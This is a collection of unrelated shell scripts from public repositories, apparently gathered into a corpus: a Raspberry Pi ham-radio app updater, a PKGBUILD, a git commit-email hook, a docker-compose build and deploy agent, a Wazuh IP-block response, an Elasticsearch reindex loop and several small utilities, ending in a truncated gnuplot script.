LIST="710.sh arim autohotspot chirp direwolf flamp fldigi flmsg flrig flwrap hamapps nexus-backup-restore.sh nexus-iptables nexus-rmsgw nexus-utilities js8call linbpq pat piardop pmon wsjtx xastir"
declare -A DESC
DESC[710.sh]="Rig Control Script for Kenwood 710/71A"
DESC[arim]="Amateur Radio Instant Messaging"
DESC[autohotspot]="Wireless HotSpot on your Pi"
DESC[chirp]="Radio Programming Tool"
DESC[direwolf]="Packet Modem/TNC and APRS Encoder/Decoder"
DESC[flamp]="Amateur Multicast Protocol tool for Fldigi"
DESC[fldigi]="Fast Light DIGItal Modem"
DESC[flmsg]="Forms Manager for Fldigi"
DESC[flrig]="Rig Control for Fldigi"
DESC[flwrap]="File Encapsulation for Fldigi"
DESC[hamapps]="Tool for Installing/Updating Apps"
DESC[nexus-backup-restore.sh]="Backup/Restore Home Folder"
DESC[nexus-iptables]="Firewall Rules for Nexus Image"
DESC[nexus-rmsgw]="RMS Gateway software for the Nexus Image"
DESC[nexus-utilities]="Scripts and Apps for Nexus Image"
DESC[js8call]="Weak signal keyboard to keyboard messaging using JS8"
DESC[linbpq]="G8BPQ AX25 Networking Package"
DESC[pat]="Winlink Email Client"
DESC[piardop]="Amateur Radio Digital Open Protocol Modem Versions 1&2"
DESC[pmon]="PACTOR Monitoring Utility"
DESC[wsjtx]="Weak Signal Modes Modem"
DESC[xastir]="APRS Tracking and Mapping Utility"
echo -e "${CHECKED[$1]}\n<s>Raspbian OS and Apps</s>\n<s>Update Raspbian OS and Apps</s>\n<s>Check for Updates</s>" > "$TFILE"
# echo -e "${CHECKED[$1]}\nRaspbian OS and Apps\nUpdate Raspbian OS and Apps\nCheck for Updates" > "$TFILE"
for A in $LIST
do
case $A in
nexus-iptables|autohotspot)
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
;;
chirp)
if command -v chirpw 1>/dev/null 2>&1
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
nexus-utilities)
if [ -s /usr/local/src/nexus/nexus-utilities.version ]
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
nexus-rmsgw)
if [[ -s /usr/local/src/nexus/nexus-rmsgw.version ]]
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
hamapps)
echo -e "FALSE\n$A\n${DESC[$A]}\nUpdated Automatically" >> "$TFILE"
;;
piardop)
if command -v piardopc 1>/dev/null 2>&1 && command -v piardop2 1>/dev/null 2>&1
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
linbpq)
if [[ -x $HOME/linbpq/linbpq ]]
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
*)
if command -v $A 1>/dev/null 2>&1
then
echo -e "${CHECKED[$1]}\n$A\n${DESC[$A]}\nInstalled - Check for Updates" >> "$TFILE"
else
echo -e "FALSE\n$A\n${DESC[$A]}\nNew Install" >> "$TFILE"
fi
;;
esac
done
}
function selfUpdate () {
# Check for and install hamapps.sh updates
echo "============= Checking for updates to updatepi.sh and hamapps.sh ========"
cd $HOME
[ -d "$HOME/hamapps" ] && rm -rf hamapps/
git clone $HAMAPPS_GIT_URL || { echo >&2 "======= git clone $HAMAPPS_GIT_URL failed ========"; exit 1; }
INSTALLED_VER="$(grep -i "^VERSION" $(which hamapps.sh))"
LATEST_VER="$(grep -i "^VERSION" hamapps/hamapps.sh)"
if [[ $INSTALLED_VER == $LATEST_VER ]]
then
echo "============= updatepi.sh and hamapps.sh are up to date ============="
else
sudo cp -f hamapps/updatepi.desktop /usr/local/share/applications/
sudo cp -f hamapps/*.sh /usr/local/bin/
[ -f $HOME/.local/share/applications/updatepi.desktop ] && rm -f $HOME/.local/share/applications/updatepi.desktop
echo "============= updatepi.sh and hamapps.sh have been updated =============="
echo
yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
--no-wrap --text="A new version of this script has been installed.\n\nPlease \
run <b>Raspberry > Hamradio > Update Pi and Ham Apps</b> again." --buttons-layout=center \
--button=Close:0
exit 0
fi
rm -rf hamapps/
}
function newVersion () {
BROWSER="$(command -v chromium-browser)"
$BROWSER https://github.com/AG7GN/images/blob/master/README.md 2>/dev/null &
}
export -f newVersion
function deprecated() {
yad --center --title="Update Apps/OS - version $VERSION" --info \
--buttons-layout=center \
--borders=10 --text-align=center \
--text="<b><span color='red'>THIS SCRIPT IS DEPRECATED.</span></b>\n
There will be no further updates to it.\nPlease upgrade to the latest Nexus DR-X image." \
--button="<b><span color='blue'>More Information</span></b>":"bash -c newVersion" \
--button=Close:0
}
REBOOT="NO"
APPS=""
OSUPDATES=NO
GITHUB_URL="https://github.com"
HAMAPPS_GIT_URL="$GITHUB_URL/AG7GN/hamapps"
# Check for Internet connectivity
if ! ping -q -w 1 -c 1 github.com > /dev/null 2>&1
then
yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
--text="<b>No Internet connection found. Check your Internet connection \
and run this script again.</b>" --buttons-layout=center \
--button=Close:0
exit 1
fi
# Comment the following line out to prevent self-updating of this script.
#selfUpdate
deprecated
# Move the direwolf scripts to /usr/local/bin if necessary
if ls $HOME/dw-*.sh >/dev/null 2>&1
then
sudo mv -f $HOME/dw-*.sh /usr/local/bin/
fi
# Check for presence of system LXDE-pi autostart and insert check-piano.sh if not
# already present
AUTOSTART="/etc/xdg/lxsession/LXDE-pi/autostart"
if [ -s $AUTOSTART ]
then
if ! grep -q check-piano.sh $AUTOSTART 2>/dev/null
then
sudo sed -i '/@pcmanfm .*/a @bash \/usr\/local\/bin\/check-piano.sh' $AUTOSTART
REBOOT="YES"
fi
fi
# Change /boot/hampi.txt to nexus.txt
if [ -s /boot/hampi.txt ]
then
sudo sed -i "s/HAMPI_RELEASE/NEXUS_VERSION/" /boot/hampi.txt
sudo mv /boot/hampi.txt /boot/nexus.txt
sudo rm -f /boot/hampi.txt*
fi
# Nexus versions of the following are now installed via nexus-utilities
sudo rm -f /usr/local/bin/hampi-release.sh
sudo rm -f /usr/local/share/applications/hampi-version.desktop
# Use the raspberrypi.org repository
DIR_="/etc/apt"
FILE_="sources.list"
if (( $(grep -c "^deb.*raspbian.raspberrypi.org" $DIR_/$FILE_) != 2 ))
then
sudo mv -f $DIR_/$FILE_ $DIR_/${FILE_}.previous
cat > /tmp/$FILE_ <<EOF
deb http://raspbian.raspberrypi.org/raspbian/ buster main contrib non-free rpi
# Uncomment line below then 'apt-get update' to enable 'apt-get source'
deb-src http://raspbian.raspberrypi.org/raspbian/ buster main contrib non-free rpi
EOF
sudo mv /tmp/$FILE_ $DIR_/$FILE_
echo $FILE_ updated
else
echo "No changes to $FILE_"
fi
RESULT=2
# Initially generate app list with pick boxes for installed apps not checked
GenerateList 0
PICKBUTTON="Select"
until [ $RESULT -ne 2 ]
do
GenerateTable $PICKBUTTON
RESULT="$?"
if [ $RESULT -eq 2 ]
then # User clicked "*Select All Installed" button
case $PICKBUTTON in
Select)
# Generate new list with pick box checked for each installed app
GenerateList 1
# Change button so user can de-select pick box for all installed apps
PICKBUTTON="Unselect"
;;
Unselect)
# Generate new list with pick box unchecked for each installed app
GenerateList 0
# Change button so user can check all installed apps.
PICKBUTTON="Select"
;;
esac
fi
done
rm -f "$TFILE"
if [ $RESULT -eq "1" ] || [[ $ANS == "" ]]
then
echo "Update Cancelled"
exit 0
else
if [[ $ANS =~ Raspbian ]]
then
OSUPDATES=YES
ANS="$(echo "$ANS" | grep -v Raspbian)"
fi
OSUPDATES=NO
#UPDATES="$(echo "$ANS" | grep Updates | cut -d, -f2 | tr '\n' ' ' | sed 's/ $//')"
#INSTALLS="$(echo "$ANS" | grep "New Install" | cut -d, -f2 | tr '\n' ' ' | sed 's/ $//')"
UPDATES="$(echo "$ANS" | grep Updates | cut -d, -f2 | tr '\n' ',' | sed 's/,$//')"
INSTALLS="$(echo "$ANS" | grep "New Install" | cut -d, -f2 | tr '\n' ',' | sed 's/,$//')"
echo
# If doing OS updates, also check for Fe-Pi and pulsaudio config file updates
[[ $OSUPDATES == "YES" ]] && UPDATES+=",fe-pi"
[[ $UPDATES == ",fe-pi" ]] && UPDATES="fe-pi"
if [ ! -z "$UPDATES" ]
then
echo "Looking for updates to $UPDATES..."
echo
$(which hamapps.sh) upgrade $UPDATES
[ $? -eq 2 ] && REBOOT="YES"
fi
echo
if [[ $INSTALLS != "" ]]
then
echo "Installing $INSTALLS..."
echo
$(which hamapps.sh) install $INSTALLS
[ $? -eq 2 ] && REBOOT="YES"
fi
echo
# if [[ $OSUPDATES == "YES" ]]
# then
## yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
##--no-wrap --text-align=center --text="<b>Raspbian OS Updates are temporarily DISABLED due to a kernel bug that affects the Fe-Pi audio board</b>\n\n" \
##--buttons-layout=center \
##--button=Close:0
## exit 0
# echo "Checking for regular Raspberry Pi OS updates..."
# echo
# sudo apt update
# sudo apt -m -y upgrade && echo -e "\n\n=========== Raspbian OS Update Finished ==========="
# # Make sure pulseaudio is not default sound device. If pulseaudio is updated,
# # it might restore this file and make pulseaudio the default sound interface.
# # So, we make sure every nonempty line is commented out.
# sudo sed -i -e '/^[^#]/ s/^#*/#/' /usr/share/alsa/pulse-alsa.conf
# fi
fi
if [[ $REBOOT == "YES" ]]
then
yad --center --title="Update Apps/OS - version $VERSION" --question \
--borders=30 --no-wrap --text-align=center \
--text="<b>Reboot Required</b>\n\n" \
--button="Reboot Now":0 --buttons-layout=center --button=Close:1
if [ "$?" -eq "1" ]
then
echo "" && echo "Skipped reboot" && echo ""
exit 0
else
echo "" && echo "Reboot" && echo"" && sudo shutdown -r +0
fi
fi
yad --center --title="Update Apps/OS - version $VERSION" --info --borders=30 \
--no-wrap --text-align=center --text="<b>Finished.</b>\n\n" --buttons-layout=center \
--button=Close:0
exit 0
| true
|
16a007ea0f810335e0666f92b385d117a6e3d3b1
|
Shell
|
petronny/aur3-mirror
|
/uade-git/PKGBUILD
|
UTF-8
| 820
| 3.046875
| 3
|
[] |
no_license
|
# Author: Enverex <ben@xnode.org>
pkgname=uade-git
pkgver=20130205
pkgrel=1
pkgdesc="Unix Amiga Delitracker Emulator"
arch=('i686' 'x86_64')
url="http://zakalwe.fi/uade"
license=('GPL')
depends=('libao')
makedepends=('pkgconfig' 'git' 'bencode-tools-git')
conflict=('uade')
provides=('uade')
install=uade.install
_gitroot="git://zakalwe.fi/uade"
_gitname="uade"
build() {
cd "${srcdir}"
msg "Connecting to GIT server...."
if [ -d ${_gitname} ] ; then
cd ${_gitname} && git pull origin
msg "Local files updated."
else
git clone ${_gitroot} ${_gitname}
fi
msg "GIT checkout done or server timeout"
msg "Starting make..."
cd "${srcdir}/${_gitname}"
./configure --prefix="/usr/" --package-prefix="${pkgdir}"
make uadecore uade123
}
package() {
cd "${srcdir}/${_gitname}"
make install
}
| true
|
86b349ff69de034dbd411badc7247e220b5d0b6e
|
Shell
|
PexMor/tooldock
|
/loopForEver
|
UTF-8
| 226
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
PARAM=$1
echo "Param: $1"
if [ "x$PARAM" != "x" -a "x$PARAM" != "xparam1" ]; then
shift
/usr/local/bin/$PARAM $*
exit
fi
echo
echo "Welcome to the docker"
echo
while true; do
date
sleep 30
done
| true
|
8af6e2ff28e12b815d0e05b49b359b3146e99089
|
Shell
|
elenst/mariadb-toolbox
|
/git_template/hooks/post-commit
|
UTF-8
| 3,316
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# Copyright (c) 2014 SkySQL Ab
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2 of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# Configuration
# -------------
# hooks.postcommitrecipients (mandatory, error if not set)
# Comma-separated list of email addresses.
# hooks.postcommitbranches (if not configured, no email is sent)
# Space-separated list of branches. * wildcard is allowed
# hooks.postcommitsender (if not configured, user.email will be used if exists,
# otherwise a generated address)
# E-mail address from which the message will be sent.
# hooks.postcommitmailer (default /usr/sbin/sendmail)
# Tool to send the e-mail
#
create_email()
{
# Subject will have format <abbreviated revid>: <First line of commit comment>
subj=$(git log --pretty="%h: %B" | head -1)
cat <<-EOF
To: $recipients
Subject: $subj
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
EOF
git show --patch-with-stat --format="revision-id: %H%nparent(s): %P%ncommitter: %cN%nbranch nick: $branch_nick%ntimestamp: %ci%nmessage:%n%n%B"
}
send_mail()
{
if [ -n "$sender" ]; then
${mailer:-/usr/sbin/sendmail} -t -f "$sender"
else
${mailer:-/usr/sbin/sendmail} -t
fi
}
#######################
# Main
#######################
if [ -n "$SKIP_COMMIT_EMAIL" ] ; then
echo "post-commit hook: SKIP_COMMIT_EMAIL set, not sending the commit notification" 1>&2
exit 0
fi
recipients=$(git config hooks.postcommitrecipients)
branches=$(git config hooks.postcommitbranches)
if [ -z "$branches" ] ; then
echo "post-commit hook: no branches configured, not sending the commit notification" 1>&2
exit 0
fi
if [ -z "$recipients" ]; then
echo "post-commit hook: ERROR: recipient list is empty, not sending the commit notification" 1>&2
exit 1
fi
branch=$(git branch 2>/dev/null | grep '^*' | sed -e 's/* //')
# We do not want globbing here, because the list of branches might contain
# a wildcard, and we need it to remain the wildcard, not to be expanded
#SHELLOPTS_SAVE=$SHELLOPTS
set -f
# Checking if the current branch matches any value from the configured list
unset _branch_found
for b in $branches
do
case $branch in
$b) _branch_found=1 ; break ;;
*) ;;
esac
done
# Restore previous options
# (Commented because SHELLOPTS is read-only in bash)
#SHELLOPTS=$SHELLOPTS_SAVE
if [ -z "$_branch_found" ] ; then
echo "post-commit hook: branch $branch is not in the configured branch list, not sending the commit notification" 1>&2
exit 0
fi
sender=$(git config hooks.postcommitsender)
sender=${sender:-$(git config user.email)}
mailer=$(git config hooks.postcommitmailer)
branch_nick=$(basename `readlink -f \`dirname \\\`git rev-parse --git-dir\\\`\``)
create_email | send_mail
| true
|
a841bf1a831ea1b7cd56c5cf4a236e8da1b18bb6
|
Shell
|
dapeng-soa/cs-agent-client
|
/dist/agent.sh
|
UTF-8
| 9,584
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
# run in Unix
ip=$(ifconfig eth0 2>/dev/null|grep "inet "|awk '{print $2}')
if [ ! $ip ];then
ip=$(ifconfig eno1 2>/dev/null|grep "inet "|awk '{print $2}')
fi
if [ ! $ip ];then
ip=$(ifconfig en0 2>/dev/null|grep "inet "|awk '{print $2}')
fi
getServerInfoResp(){
if [ $# -lt 2 ];then
echo "invalid cmd...please input your request [serviceName],[serviceName.yml]"
exit 1
fi
if [ -e "$2" ];then
time=`stat -c %Y $2 2>/dev/null`
# macos
if [ ! $time ];then
time=`stat -f "%B %N" $2 | awk '{print$1}'`
fi
else
time=0
fi
result1=`docker ps | grep -w "$1$" | awk '{print $2}' | awk -F ':' '{print $NF}'`
if [[ -z $result1 ]]; then
result="$ip:$1:false:$time:none"
else
result="$ip:$1:true:$time:$result1"
fi
echo $result
}
deployResp() {
if [ $# -lt 2 ];then
echo "invalid cmd...please input your request [serviceName],[serviceName.yml]"
exit 1
fi
serviceName="$1"
ymlFile="$2"
if [ ! -f "$ymlFile" ]; then
echo "找不到对应的$ymlFile"
return 1
else
res=$(docker-compose -p $serviceName -f $ymlFile up -d 2>&1)
if [ $? -ne 0 ]; then
echo "$res"
echo -e "\033[31m update $serviceName failed \033[0m"
echo -e "\033[33m done \033[0m"
return 1
else
echo "$res"
echo -e "\033[32m update successful!!! \033[0m"
echo -e "\033[33m done \033[0m"
return 0
fi
fi
}
stopResp() {
echo $@
echo -e "\033[33m $ip stopping $1 \033[0m"
docker stop $1
if [ $? -ne 0 ]; then
echo -e "\033[31m stop $1 fail \033[0m"
return 1
else
echo -e "\033[32m stop $1 success \033[0m"
return 0
fi
}
restartResp() {
echo -e "\033[33m $ip restarting $1 \033[0m"
docker restart $1
if [ $? -ne 0 ]; then
echo -e "\033[31m restart $1 fail \033[0m"
return 1
else
echo -e "\033[32m restart $1 success \033[0m"
return 0
fi
}
rmContainerResp() {
echo $@
echo -e "\033[33m $ip rm Container $1 \033[0m"
docker rm $1
if [ $? -ne 0 ]; then
echo -e "\033[31m rm Container $1 fail \033[0m"
return 1
else
echo -e "\033[32m rm Container $1 success \033[0m"
return 0
fi
}
getYamlFileResp() {
cat $1
}
getYamlFile() {
cat $1
}
syncNetworkResp() {
networkName="$1"
driver="$2"
subnet="$3"
opt="$4"
docker network create -d=$driver --subnet=$subnet -o=$opt $networkName
if [ $? -ne 0 ]; then
echo -e "\033[31m $ip create network $networkName fail \033[0m"
return 1
else
echo -e "\033[32m $ip create network $networkName success \033[0m"
return 0
fi
}
build() {
# build info start
serviceName=$1
projectUrl=$2
serviceBranch=$3
imageName=$4
realService=$5
deployHost=$6
buildId=$7
cmd=`echo ${@:8}`
echo -e "\033[33mbuild service [$serviceName] [$serviceBranch] start... \033[0m"
echo -e "\033[32mbuild info=======================================start \033[0m"
echo "|"
echo "| buildId: [$buildId]"
echo "| build realService:[$realService]"
echo "| clientIp: [$ip]"
echo "| deployHost: [$deployHost]"
echo "| ori cmd: [$@]"
echo "| serviceName: [$serviceName]"
echo "| imageName: [$imageName]"
echo "| projectUrl: [$projectUrl]"
echo "| serviceBranch: [$serviceBranch]"
echo "| cmd: [$cmd]"
projectRootName=`echo ${2##*/} | cut -d . -f 1`
echo "| projectGitName: [$projectRootName]|"
WORKSPACE=`echo $COMPOSE_WORKSPACE`
AGENT_PWD=`echo $AGENT_PATH`
echo "| env WORKSPACE : [$WORKSPACE]|"
echo "| env AGENT_HOME : [$AGENT_PWD]"
echo "|"
echo -e "\033[32mbuild info=======================================end \033[0m"
# build info end
# check start
if [ ! -d "$WORKSPACE" ];
then
echo -e "\033[31m 目录不存在,请添加COMPOSE_WORKSPACE环境变量指定代码空间: $WORKSPACE, 退出 \033[0m"
echo $serviceName" BUILD_END:1"
return 1
fi
if [ ! -d "$AGENT_PWD" ];
then
echo -e "\033[31m 目录不存在,请添加AGENT_PATH环境变量指定agent目录: $AGENT_PWD, 退出 \033[0m"
echo $serviceName" BUILD_END:1"
return 1
fi
cd $WORKSPACE
if [ ! -d $projectRootName ];
then
echo "项目不存在, 拉取项目: $projectUrl"
git clone $projectUrl
if [ $? -ne 0 ]; then
echo -e "\033[31mclone faild \033[0m"
echo $serviceName" BUILD_END:1"
return 1
fi
else
echo "项目已存在, 执行构建指令"
fi
# check end
cd $AGENT_PWD
if [ ! -f ".build.cache.ini" ];
then
echo ".build.cache.ini 文件不存在,新建"
touch .build.cache.ini
else
echo ".build.cache.ini 文件已存在"
cat .build.cache.ini
fi
oldGitId=`cat .build.cache.ini | grep $serviceName | awk -F "=" '{print $2}'`
cd $WORKSPACE/$projectRootName
echo -e "\033[32mupdate [$serviceName] code:::branch [$serviceBranch]================================================start \033[0m"
git pull
git checkout $serviceBranch
git pull
newGitId=`git rev-parse --short=7 HEAD`
echo -e "\033[32mupdate [$serviceName] code:::branch [$serviceBranch]:::[$newGitId]====================================end \033[0m"
echo 'oldGitId: '$oldGitId', newGitId: '$newGitId
if [ "$newGitId" = "$oldGitId" ];
then
echo "gitId 一致,不需要重新构建,跳过..."
BUILD_STATUS=$?
else
#remove service old gitid
#echo "更新.build.cache.ini gitid"
#cd $AGENT_HOME
#sed -i "/^$1/d" .build.cache.ini
#add service new gitid at last line of .build.cache.ini
#echo "$1=$newGitId" >> .build.cache.ini
echo "执行指令: $cmd"
$cmd
BUILD_STATUS=$?
fi
if [ $BUILD_STATUS = 0 ];
then
#remove service old gitid
echo -e "\033[32m构建成功,更新gitid \033[0m"
cd $AGENT_PWD
sed -i "/^$serviceName/d" .build.cache.ini
#add service new gitid at last line of .build.cache.ini
echo "$serviceName=$newGitId" >> .build.cache.ini
## if is realService ,deploy service
if [ "$serviceName" = "$realService" ]; then
echo -e "\033[32mbuild is realService , deploy realService \033[0m"
## 如果 deployHost 与clientIp 不同,则需要将此次发布任务提交委托给其他机器
# 如果是远程服务器部署,需要推送镜像,不推送latest镜像,直接推送新的tag镜像,由远程自行打tag为latest
echo -e "\033[32mdocker push $imageName:$newGitId start\033[0m"
docker push $imageName:$newGitId
# 如何将服务部署指令发送到其他主机?
# 1.已标准输出返回给客户端,客户端根据关键字发送事件
# 标示关键字:源ip:部署节点:部署的服务:镜像名:最新的tag号
echo "[REMOTE_DEPLOY]:::$buildId:::$ip:::$deployHost:::$serviceName:::$imageName:::$newGitId"
echo "waiting deploy"
# 如果是远程部署,先把当前脚本停止,使其BUILD_END状态不被改变
return 1
else
echo -e "\033[33m[$serviceName] not is realService , skip deploy\033[0m"
fi
else
echo "构建失败, 跳过更新gitid"
fi
echo $1" BUILD_END:$BUILD_STATUS"
}
remoteDeployResp(){
buildId=$1
sourceIp=$2
deployHost=$3
serviceName=$4
imageName=$5
imageTag=$6
AGENT_PWD=`echo $AGENT_PATH`
# 标示来源的节点地址
sourceHostPre=":::[SOURCE_HOST]:::$sourceIp"
echo -e "\033[33mdeploy service [$serviceName] on [$deployHost] start... \033[0m$sourceHostPre"
echo -e "\033[32mdeploy info=======================================start \033[0m$sourceHostPre"
echo "|buildId: [$buildId]$sourceHostPre"
echo "|sourceIp: [$sourceIp]$sourceHostPre"
echo "|deployHost: [$deployHost]$sourceHostPre"
echo "|serviceName: [$serviceName]$sourceHostPre"
echo "|imageName: [$imageName]$sourceHostPre"
echo "|imageTag: [$imageTag]$sourceHostPre"
echo "|env AGENT_PATH: [$AGENT_PWD]$sourceHostPre"
echo -e "\033[32mdeploy info=======================================end \033[0m$sourceHostPre"
# pull image
echo -e "\033[32mpull image $imageName:$imageTag start \033[0m$sourceHostPre"
pullResp=$(docker pull $imageName:$imageTag 2>&1)
echo "$pullResp"|sed 's/$/&'"$sourceHostPre"'/g'
# to latest
echo -e "\033[32mtag to latest image\033[0m $sourceHostPre"
echo "[$imageName:$imageTag => $imageName:latest]$sourceHostPre"
## tag to latest images
docker tag $imageName:$imageTag $imageName:latest
images=$(docker images | grep $(docker images | grep $imageName | grep $imageTag | awk '{print$3}') 2>&1)
echo "$images"|sed 's/$/&'"$sourceHostPre"'/g'
## deploy
res=$(deployResp $serviceName $AGENT_PWD/yamlDir/$serviceName.yml 2>&1)
pss=$(docker ps | grep -w "$serviceName$" 2>&1)
if [ $? -ne 0 ]; then
echo "$res" |sed 's/$/&'"$sourceHostPre"'/g'
echo -e "\033[31mdeploy faild \033[0m$sourceHostPre"
echo -e "\033[32m=========> run info\033[0m$sourceHostPre"
echo "$pss" | sed 's/$/&'"$sourceHostPre"'/g'
echo $serviceName" [REMOTE_DEPLOY_END]:1:$buildId:$sourceIp"
return 1
else
echo "$res" |sed 's/$/&'"$sourceHostPre"'/g'
echo -e "\033[32m=========> run info\033[0m$sourceHostPre"
echo "$pss" | sed 's/$/&'"$sourceHostPre"'/g'
echo -e "\033[32mdeploy service $serviceName successful\033[0m$sourceHostPre"
echo $serviceName" [REMOTE_DEPLOY_END]:0:$buildId:$sourceIp"
return 0
fi
}
case $1 in
"getServerInfoResp" | "build" | "deployResp" | "stopResp" | "restartResp" | "rmContainerResp" | "getYamlFile" |"getYamlFileResp" | "syncNetworkResp" | "remoteDeployResp") eval $@ ;;
*) echo "invalid command $1" ;;
esac
| true
|
d4e857ae11e3db2e4024ec56ba409b410ece2aea
|
Shell
|
jcccookie/cs344
|
/program1/calc
|
UTF-8
| 275
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
#a=5
#b=2
#c=1
##a=$(( 3 * ( $b + $c ) ))
##d=$(( 3 / $b ))
##echo $a
##echo $d
#
#
#
#result=$(( ($a + ($b/2)*( ($a>0)*2-1 )) / $b ))
#echo $result
a="a b c"
b="1 2 3"
for i in $a; do
for j in $b; do
[ "$i" -eq "$j" ] && continue
echo "$i + $j"
done
done
| true
|
27e011e22fb6e2ec7817186463beaf0e745696d8
|
Shell
|
zangwanshun/osquery-wazuh-response
|
/ip-customblock.sh
|
UTF-8
| 792
| 3.5625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Custom OSSEC block / Easily modifiable for custom responses (touch a file, insert to db, etc).
# Expect: srcip
# Copyright (C) 2015-2020, Wazuh Inc.
# Author: Daniel B. Cid
# Last modified: Feb 16, 2013
ACTION=$1
USER=$2
IP=$3
LOCAL=`dirname $0`;
cd $LOCAL
cd ../
PWD=`pwd`
# Logging the call
echo "`date` $0 $1 $2 $3 $4 $5"
# IP Address must be provided
if [ "x${IP}" = "x" ]; then
echo "$0: Missing argument <action> <user> (ip)"
exit 1;
fi
# Custom block (touching a file inside /ipblock/IP)
if [ "x${ACTION}" = "xadd" ]; then
if [ ! -d /ipblock ]; then
mkdir /ipblock
fi
touch "/ipblock/${IP}"
elif [ "x${ACTION}" = "xdelete" ]; then
rm -f "/ipblock/${IP}"
# Invalid action
else
echo "$0: invalid action: ${ACTION}"
fi
exit 1;
| true
|
2b84792842be72453666ab38cab8a3d8c514a52c
|
Shell
|
sumanjs/suman
|
/dev-scripts/checkout-new-feature-branch.sh
|
UTF-8
| 318
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e;
git fetch origin
git checkout dev
git merge origin/dev
time_millis=$(node -e 'console.log(Date.now())');
NEW_FEATURE_BRANCH="feature_${USER}_${time_millis}"
git checkout -b "${NEW_FEATURE_BRANCH}"
git push -u origin HEAD # makes sure git is tracking this branch on the primary remote
| true
|
93d9cdd74b862d2a4bd2c85749a6a1a17686eda0
|
Shell
|
lumeng/repogit-mengapps
|
/file_system/warn-about-low-disk-space.sh
|
UTF-8
| 623
| 3.453125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
df -lg | grep -vE '^Filesystem' | grep -vE '/private/var/vm$' | awk '{print $9 " " $4 }' | while read RESULT;
do
DISK_SPACE=$(echo $RESULT | awk '{ print $2}' | cut -d'%' -f1 )
MOUNTING_PATH=$(echo $RESULT | awk '{ print $1 }' )
if [[ $DISK_SPACE -le 5 ]]; then
say "${DISK_SPACE}GB disk space left"
if [[ $MOUNTING_PATH -ne "/" ]]; then
say "at $MOUNTING_PATH!"
fi
echo "available disk space left: $(date -u +%Y-%m-%dT%H:%M:%SZ) $(hostname) ${DISK_SPACE}GB $MOUNTING_PATH !"
# mail -s "Alert: ${DISK_SPACE}GB left at $MOUNTING_PATH" you@somewhere.com
fi
done
## END
| true
|
dd4a923c87e87783dd9503f22d70f3c2f67a687c
|
Shell
|
hidepin/elkb-training
|
/reindex.sh
|
UTF-8
| 883
| 2.75
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
remote_host="192.168.0.xx"
dest_host="192.168.0.yy"
for index in `curl -XGET "http://${remote_host}:9200/_cat/indices?h=index&s=index"`
do
if [[ $index =~ "metric" ]]; then
curl -XPUT "http://${dest_host}:9200/${index}" -H 'Content-Type: application/json' -d'{
"settings": {
"number_of_shards": 1,
"number_of_replicas": 0,
"index.codec": "best_compression"
}
}'
curl -XPOST "http://${dest_host}:9200/_reindex?pretty" -H 'Content-Type: application/json' -d"
{
\"source\": {
\"remote\": {
\"host\": \"http://${remote_host}:9200\"
},
\"index\": \"${index}\"
},
\"dest\": {
\"index\": \"${index}\"
}
}
"
fi
done
| true
|
ad70c31701063ab264ae81f0997291bb4737ec43
|
Shell
|
HemilModi/Hemil_Modi
|
/Lab_3/Shell_script_7.sh
|
UTF-8
| 388
| 3.40625
| 3
|
[] |
no_license
|
count=1
while [ $count -eq 1 ]
do
echo "Enter a string related to january"
read a
case $a in
"Jan")
echo "January" ;;
"Janu")
echo "January" ;;
"Janua")
echo "January" ;;
"January")
echo "January" ;;
*)
echo "Can not understand" ;;
esac
echo " Do you want to continue [1/0] : "
read b
if [ $b -eq 1 ]
then
count=1
else
count=0
fi
done
| true
|
828d64b3df44ef6014a47a5a7317de26741e26fb
|
Shell
|
aetherise/aetherise
|
/plot_signal3d.sh
|
UTF-8
| 994
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [[ $# -eq 0 ]]; then
echo "$0 <filename> [title] [output-filename] [gnuplot-terminal]"
exit 1
fi
title=$2
if [ "$3" = "" ]; then
term="qt 0"
else
if [ "$4" = "" ]; then
# fontsize 8pt and width 16.9cm on a 96dpi display
# 10.67*72/96=8pt, 640/96*2.54=16.9cm
term="svg font 'Sans,8' size 480,360 linewidth 0.5 background '#ffffff'; set output '$3'"
else
term="$4""; set output '$3'"
fi
fi
if [[ $LANG == de* ]]
then
xaxis="Sternzeit / h"
yaxis="Azimut"
zaxis="Verschiebung / λ"
data_title="Daten"
